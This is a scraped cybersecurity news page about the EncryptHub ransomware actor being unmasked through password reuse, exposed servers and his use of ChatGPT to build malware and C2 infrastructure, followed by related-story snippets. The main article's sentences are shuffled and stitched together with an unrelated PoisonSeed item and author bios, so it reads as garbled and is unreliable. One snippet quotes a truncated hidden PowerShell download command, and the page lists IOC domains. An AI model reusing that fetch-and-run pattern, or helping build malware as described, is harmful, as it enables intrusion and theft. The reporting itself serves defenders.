EncryptHub Ransomware Unmasked Using ChatGPT & OPSEC Mistakes

What ultimately led to EncryptHub’s unmasking was a catastrophic series of operational security failures, including password reuse across criminal infrastructure, failure to enable two-factor authentication, and inadequate server hardening that left directory listings publicly accessible. A notorious threat actor operating under the alias “EncryptHub” has been exposed due to a series of operational security failures and unconventional use of AI tools. What distinguishes EncryptHub from typical cybercriminals is the dichotomy of his activities – while conducting malicious campaigns, he simultaneously contributed to legitimate security research, even receiving acknowledgment from Microsoft Security Response Center for discovering CVE-2025-24071 and CVE-2025-24061. This Ukrainian cybercriminal, who fled his hometown approximately a decade ago, has been orchestrating increasingly sophisticated ransomware campaigns since early 2024, targeting organizations worldwide with custom-built malware designed to steal cryptocurrency and sensitive information. This case highlights the emerging trend of threat actors leveraging artificial intelligence for malware development while still falling victim to basic security mistakes. The AI assistant was leveraged to create nearly every component of his malicious infrastructure, from writing malware code to configuring Telegram bots, command and control servers, phishing sites, and onion services. EncryptHub’s exposed infrastructure revealed numerous IOCs, including multiple PowerShell scripts, executable files, and command and control domains like vexio[.]io and echonex[.]ai that organizations should monitor for in their environments. Outpost24’s KrakenLabs researchers identified the malware after discovering an exposed JSON configuration file on EncryptHub’s command and control server. Cyber Security News is a Dedicated News Platform For Cyber News, Cyber Attack News, Hacking News & Vulnerability Analysis. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news. Perhaps most critically, the threat actor tested his own malware on development systems, inadvertently exfiltrating his personal information and access credentials. A sophisticated phishing campaign dubbed "PoisonSeed" has emerged targeting customer relationship management (CRM) and bulk email service providers in a concerning supply chain attack. In one particularly revealing conversation, EncryptHub asked the AI to evaluate whether he was better suited to be a “black hat or white hat” hacker, even confessing to criminal activities and exploits he had developed. Tushar is a Cyber security content editor with a passion for creating captivating and informative content. This file contained Telegram bot information that provided investigators with a digital trail leading directly to the threat actor’s activities. The clipper malware developed with ChatGPT’s assistance represents one of EncryptHub’s primary attack vectors.

This Cyber News was published on cybersecuritynews.com. Publication date: Fri, 04 Apr 2025 14:55:14 +0000

Cyber News related to EncryptHub Ransomware Unmasked Using ChatGPT & OPSEC Mistakes

10 Best Ransomware Protection Tools - 2025 - It protects devices from ransomware and other cyber threats using advanced threat intelligence, behavioral analysis, and cloud-based technology. It monitors and prevents ransomware assaults on personal files and automatically restores encrypted ...
1 month ago Cybersecuritynews.com

EncryptHub Ransomware Unmasked Using ChatGPT & OPSEC Mistakes - What ultimately led to EncryptHub’s unmasking was a catastrophic series of operational security failures, including password reuse across criminal infrastructure, failure to enable two-factor authentication, and inadequate server hardening that ...
1 week ago Cybersecuritynews.com CVE-2025-24071

10 Best Ransomware File Decryptor Tools in 2025 - Kaspersky Rakhni Decryptor contains different decryption tools based on various versions of Rakhni ransomware and helps you decrypt encrypted files on your system. PyLocky Ransomware Decryption Tool is a free and open source developed and released by ...
5 days ago Cybersecuritynews.com

XSS Marks the Spot: Digging Up Vulnerabilities in ChatGPT - With its widespread use among businesses and individual users, ChatGPT is a prime target for attackers looking to access sensitive information. In this blog post, I'll walk you through my discovery of two cross-site scripting vulnerabilities in ...
1 year ago Imperva.com

EncryptHub A Multi-Stage Malware Compromised 600 Organizations - The multi-stage attack begins with the execution of a PowerShell command that downloads the first-stage payload: “powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command “Invoke-RestMethod -Uri ...
1 month ago Cybersecuritynews.com

EncryptHub breaches 618 orgs to deploy infostealers, ransomware - A threat actor tracked as 'EncryptHub,' aka Larva-208, has been targeting organizations worldwide with spear-phishing and social engineering attacks to gain access to corporate networks. Once EncryptHub breaches a targeted system, it ...
1 month ago Bleepingcomputer.com Blacksuit Ransomhub

How enterprises are using gen AI to protect against ChatGPT leaks - ChatGPT is the new DNA of shadow IT, exposing organizations to new risks no one anticipated. Enterprise workers are gaining a 40% performance boost thanks to ChatGPT based on a recent Harvard University study. A second study from MIT discovered that ...
1 year ago Venturebeat.com

CVE-2021-36845 - Multiple Authenticated Stored Cross-Site Scripting (XSS) vulnerabilities in YITH Maintenance Mode (WordPress plugin) versions < 1.3.8, there are 46 vulnerable parameters that were missed by the vendor while patching the 1.3.7 version to 1.3.8. ...
3 years ago

EncryptHub's dual life: Cybercriminal vs Windows bug-bounty researcher - EncryptHub, a notorious threat actor linked to breaches at 618 organizations, is believed to have reported two Windows zero-day vulnerabilities to Microsoft, revealing a conflicted figure straddling the line between cybercrime and security research. ...
3 days ago Bleepingcomputer.com Ransomhub Blacksuit

How Are Security Professionals Managing the Good, The Bad and The Ugly of ChatGPT? - ChatGPT has emerged as a shining light in this regard. Already we're seeing the platform being integrated into corporate systems, supporting in areas such as customer success or technical support. The bad: The risks surrounding ChatGPT. Of course, ...
1 year ago Cyberdefensemagazine.com

ChatGPT Extensions Could be Exploited to Steal Data and Sensitive Information - API security professionals Salt Security have released new threat research from Salt Labs highlighting critical security flaws within ChatGPT plugins, presenting a new risk for enterprises. Plugins provide AI chatbots like ChatGPT access and ...
1 year ago Itsecurityguru.org

EncryptHub linked to zero-day attacks targeting Windows systems - In attacks spotted by Trend Micro's researchers before reporting the flaw to Microsoft, EncryptHub (also known as Water Gamayun or Larva-208) used CVE-2025-26633 zero-day exploits to execute malicious code and exfiltrate data from compromised ...
2 weeks ago Bleepingcomputer.com CVE-2025-26633

Hangzhou's Cybersecurity Breakthrough: How ChatGPT Elevated Ransomware Resolution - The Chinese media reported on Thursday that local police have arrested a criminal gang from Hangzhou who are using ChatGPT for program optimization to carry out ransomware attacks for the purpose of extortion. An organization in the Shangcheng ...
1 year ago Cysecurity.news

Google Researchers' Attack Prompts ChatGPT to Reveal Its Training Data - A team of researchers primarily from Google's DeepMind systematically convinced ChatGPT to reveal snippets of the data it was trained on using a new type of attack prompt which asked a production model of the chatbot to repeat specific words forever. ...
1 year ago 404media.co

Are you sure you want to share that with ChatGPT? How Metomic helps stop data leaks - Open AI's ChatGPT is one of the most powerful tools to come along in a lifetime, set to revolutionize the way many of us work. Workers aren't content to wait until organizations work this question out, however: Many are already using ChatGPT and ...
1 year ago Venturebeat.com

Hive Ransomware: A Detailed Analysis - This past week, on January 26th, to be exact, the FBI successfully shut down the Hive ransomware group and saved victims over a hundred million dollars in ransom payments and remediation costs. As ransomware continues to be a national security threat ...
2 years ago Heimdalsecurity.com LockBit

Google to Announce Chat-GPT Rival On February 8 Event - There seems to be a lot of consternation on Google's part at the prospect of a showdown with ChatGPT on the February 8 event. The search giant has been making moves that suggest it is preparing to enter the market for large language models, where ...
2 years ago Cybersecuritynews.com

Researchers Uncover Simple Technique to Extract ChatGPT Training Data - Can getting ChatGPT to repeat the same word over and over again cause it to regurgitate large amounts of its training data, including personally identifiable information and other data scraped from the Web? The answer is an emphatic yes, according to ...
1 year ago Darkreading.com

Medusa Ransomware Turning Your Files into Stone - Unit 42 Threat Intelligence analysts have noticed an escalation in Medusa ransomware activities and a shift in tactics toward extortion, characterized by the introduction in early 2023 of their dedicated leak site called the Medusa Blog. The Unit 42 ...
1 year ago Unit42.paloaltonetworks.com Medusa

The Top 10 Ransomware Groups of 2023 - This article takes an in-depth look at the rise in ransomware attacks over the past year and the criminal groups driving the surge in cyber extortion. LockBit has established itself as one of the most notorious ransomware operations since emerging on ...
1 year ago Securityboulevard.com TA505 8base LockBit BianLian Medusa Noescape Black Basta

ChatGPT Clone Apps Collecting Personal Data on iOS, Play Store - On Android devices, one of the apps analyzed by researchers has more than 100,000 downloads, tracks, and shares location data with ByteDance and Amazon, etc. ChatGPT, the AI software, has already taken the Internet by storm, and that is why ...
2 years ago Hackread.com Everest

Ransomware Roundup - The Ransomware Roundup report aims to provide readers with brief insights into the evolving ransomware landscape and the Fortinet solutions that protect against those variants. This edition of the Ransomware Roundup covers the 8base ransomware. 8base ...
1 year ago Feeds.fortinet.com 8base

Foreign states already using ChatGPT maliciously, UK IT leaders believe - Most UK IT leaders believe that foreign states are already using the ChatGPT chatbot for malicious purposes against other nations. That's according to a new study from BlackBerry, which surveyed 500 UK IT decision makers revealing that, while 60% of ...
2 years ago Csoonline.com

Locking Down ChatGPT: A User's Guide to Strengthening Account Security - OpenAI officials said that the user who reported his ChatGPT history was a victim of a compromised ChatGPT account, which resulted in the unauthorized logins. OpenAI has confirmed that the unauthorized logins originate from Sri Lanka, according to an ...
1 year ago Cysecurity.news